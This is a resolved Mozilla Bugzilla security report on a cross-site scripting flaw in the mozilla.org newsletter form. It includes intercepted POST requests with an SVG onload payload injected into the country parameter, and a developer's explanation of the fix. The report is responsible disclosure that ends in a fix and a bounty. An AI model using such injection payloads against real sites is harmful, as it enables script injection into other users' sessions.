Mozilla.org is vulnerable to xss vulnerability.

RESOLVED FIXED

Status

www.mozilla.org
General
RESOLVED FIXED
3 years ago
5 months ago

People

(Reporter: Hamza Bettache, Assigned: pmac)

Tracking

({sec-high})

other
x86
Windows 8.1
sec-high
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

(Reporter)

Description

3 years ago
Created attachment 8542956 [details]
xss.jpg

Hello,

-Description:

My name is Hamza Bettache and i'm a web app security researcher,as i was trying to download mozzila firefox

i've found that the newsletter's form is vulnerable to xss vulnerability (cross site scritping),the inputs country,lang and 

fmt are not sanitized (filtred),and the attacker can inject his javascript payload to make a successful xss attack 

Steps to reproduce the vulnerability:

1- go to https://www.mozilla.org/fr/newsletter/ and fill in the necessary informations,use a web proxy like BurpSuite 

to intercept the request.

-2 while intercpting the request we get the following post :

POST /fr/newsletter/ HTTP/1.1

Referer: https://www.mozilla.org/fr/newsletter/

newsletters=mozilla-and-you&source_url=https%3A%2F%2Fwww.mozilla.org%2Ffr%2Fnewsletter%2F&email=adressss%40hotmail.fr&country=dz&lang=fr&fmt=H&privacy=on

we change one of three parameters we've talked above to our payload wich will be <svg/onload=alert("xss")>

so the request well as the following : 

POST /fr/newsletter/ HTTP/1.1

Referer: https://www.mozilla.org/fr/newsletter/

newsletters=mozilla-and-you&source_url=https%3A%2F%2Fwww.mozilla.org%2Ffr%2Fnewsletter%2F&email=adressss%40hotmail.fr&country=<svg/onload=alert("xss")>&lang=fr&fmt=H&privacy=on

and we get a pop-up message wich confirms xss vulnerability :

link of a jpeg image:

http://im48.gulfup.com/UtNtVe.jpg

here's a POC (proof of concept) :

http://www.youtube.com/watch?v=vk_REGut7J8&feature=youtu.be

i hope you'll fix it as soon as possible

regards...

Hamza.
Assignee: nobody → server-ops
Component: General → Server Operations
Product: Firefox → mozilla.org
QA Contact: shyam
Version: unspecified → other
Group: core-security → websites-security
Comment hidden (off-topic)
Assignee: server-ops → nobody
Component: Server Operations → General
Product: mozilla.org → www.mozilla.org
QA Contact: shyam
Please be patient and wait for developers to take a look at this issue. As I said in email, January 1st is a national holiday. This bug was also opened in the wrong product and component and unlikely to be seen there.
Flags: sec-bounty?
The issue is with the AJAX-based form submission. The error messages returned can contain unsanitized user input and will thus result in the reported behavior.

I should have a fix in a PR shortly.

Thanks for the report!
Assignee: nobody → pmac
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true

Comment 4

3 years ago
This was fixed in https://github.com/pmclanahan/bedrock/commit/55d8a0ebfab931f96903f2c3f7b7d21aa16ffe47 which is now in production.
Status: ASSIGNED → RESOLVED
Last Resolved: 3 years ago
Resolution: --- → FIXED
(Reporter)

Comment 5

3 years ago
Hello,
thank you for your reply
it's good to have the bug fixed,
i'm wondring about my bounty ? 
thanks again
regards...
The bounty committee meets once a week. We will consider this bug the next time we meet.
(Reporter)

Comment 7

3 years ago
Thank you
i'm waiting to hear from you
my regards....
Flags: sec-bounty? → sec-bounty+
Keywords: sec-high
Blocks: 835434
Group: websites-security
You need to log in before you can comment on or make changes to this bug.